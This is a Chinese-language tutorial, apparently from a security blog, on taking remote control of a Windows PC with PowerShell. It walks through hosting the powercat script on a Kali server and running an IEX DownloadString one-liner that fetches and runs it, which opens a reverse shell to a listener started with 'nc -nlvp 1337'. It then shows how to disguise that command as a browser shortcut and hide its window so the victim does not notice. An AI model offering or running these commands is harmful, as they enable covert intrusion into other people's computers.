相关阅读
data-postsbox="{"id":12044,"title":"如何通过一个exe文件远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4429,"comment_count":16,"category":"knowledge","is_forum_post":false}">{"id":12044,"title":"如何通过一个exe文件远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4429,"comment_count":16,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}">{"id":2373,"title":"【视频教学】如何远程控制任何安卓设备?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":21850,"comment_count":1000,"category":"sg","is_forum_post":false}
data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}">{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":10680,"title":"黑客是如何黑进手机摄像头?CamPhish了解一下","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220227055218920.png","cover_video":"","views":13867,"comment_count":28,"category":"knowledge","is_forum_post":false}">{"id":10680,"title":"黑客是如何黑进手机摄像头?CamPhish了解一下","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/02/20220227055218920.png","cover_video":"","views":13867,"comment_count":28,"category":"knowledge","is_forum_post":false}
视频讲解
图文讲解
Powershell可以做什么?
比方说创建一个文件
New-Item -Path '.\newfile.txt' -ItemType File
可以看到文件成功创建了
当然,Powershell能玩的不止这些!
你还可以下载文件到本地
譬如,我们下载内网的资源
wget "http://192.168.0.192/default/ps1" -outfile "C:\users\loiliangyang\Desktop\default.ps1"
我们可以看到运行完命令后,文件已经下载到桌面上了
使用Kali linux托管文件
启动Apache服务
systemctl start apache2.service
下载要投递的恶意文件
使用kali linux下载我们要投递的恶意文件
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
将我们想要发给目标用户的文件存储在/var/www/html目录下
cp powercat.ps1 /var/www/html/powercat.ps1
如何让powershell下载并运行文件?
通常我们使用powershell下载文件,使用下面的命令就好了
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1')"
这里我们想要他下载完成后运行,则可以使用;进行下一步操作
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
这里相当于要完成一个反弹shell,将终端转到192.168.0.192的1337端口,因此在运行下面命令前,我们需要到kali上进行设置
nc -nlvp 1337
然后在运行刚才的windows powershell命令
之后神奇的事情就发生了,我们可以使用kali linux向windows终端发送命令
譬如我们想创建一个文件告诉电脑已经被入侵
我们进入windows的桌面位置
cd Desktop
然后创建一个you have been hacked by mr hacker loi(你已经被hackerloi黑了)的hacked.txt文件
echo "you have been hacked by mr hacker loi" > hacked.txt
我们甚至还可以使用notepad命令打开这个文件
notepad hacked.txt
这看起来有些嚣张了……返回windows电脑,可以看到弹出的txt文本提示电脑已经被黑了
小技巧:使用快捷方式混淆
很多热心网友表示,用户通常不会自己打开这些恶意文件,那么也不是没有办法,我们可以将其伪装成一些特定的快捷方式,比方说浏览器
我们可以右键属性看下打开浏览器实际会访问的目标
可以看到目标居然是我们刚才的命令
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
这里powershell.exe会根据你电脑实际的路径进行补全,譬如变成
C:\Windows\System32\WindowsPowerShell\V1.0\powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
但是我们点击这个伪装的快捷方式
会发现有一个很假的事情,就是这个黑色的弹窗会一直保留
那么如何进行优化呢?很简单!
在之前的powershell.exe命令后面增加-w h即可隐藏窗口
C:\Windows\System32\WindowsPowerShell\V1.0\powershell.exe -w h -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
这样再打开就会自动隐藏了,是不是很有趣呢?